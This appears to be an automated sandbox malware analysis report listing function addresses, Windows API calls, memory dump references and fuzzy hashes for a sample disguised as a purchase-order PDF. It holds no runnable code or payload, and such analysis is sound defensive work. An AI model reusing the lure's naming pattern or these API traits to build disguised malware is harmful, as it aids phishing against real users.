                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                                                                                                                                                            • String ID: %lu$HH
                                                                                                                                                                                                                                                                                                            • API String ID: 3164766367-3924996404
                                                                                                                                                                                                                                                                                                            • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                                                                                                                                                                                                            • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                                                                                                                                                                                                                                                            Function 00415702 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                                                                                                                                                                                                                                                            • __calloc_crt.LIBCMT ref: 00415743
                                                                                                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 00415750
                                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                                                                                                                                                                                                                                                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 004157A9
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1269668773-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                                                                                                                                                                                                                            • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                                                                                                                                                                                                                                                            Function 00439102 Relevance: 10.5, APIs: 7, Instructions: 46threadCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                                                                                                                                                                                                            • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                                                                                                                                                                                                                                                            Function 0041568B Relevance: 10.5, APIs: 7, Instructions: 37threadCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                                                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                                                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                                                                                                                                                                                                            • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4166825349-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                                                                                                                                                                                                                                                            Function 00434124 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                                                                                                                                                                                                                                                            • API String ID: 2574300362-3261711971
                                                                                                                                                                                                                                                                                                            • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                                                                                                                                                                                                            • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                                                                                                                                                                                                                                                            Function 0047B1D0 Relevance: 9.5, APIs: 6, Instructions: 489COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                                                                                                                                                                                                            • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                                                                                                                                                                                                                                                            Function 004336C7 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00433724
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00433814
                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00433842
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3220332590-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                                                                                                                                                                                                            • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                                                                                                                                                                                                                                                            Function 00457838 Relevance: 9.2, APIs: 6, Instructions: 176COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1612042205-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1bdbad209a9f2f44fe01a9dcdf7f5a882a75906cac9df52365f752c76c4db998
                                                                                                                                                                                                                                                                                                            • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bdbad209a9f2f44fe01a9dcdf7f5a882a75906cac9df52365f752c76c4db998
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                                                                                                                                                                                                                                                            Function 0044C522 Relevance: 9.2, APIs: 6, Instructions: 155windowkeyboardCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                                                                                                                                                                                                                                            • SendInput.USER32 ref: 0044C6E2
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2221674350-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                                                                                                                                                                                                            • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                                                                                                                                                                                                                                                            Function 00445153 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
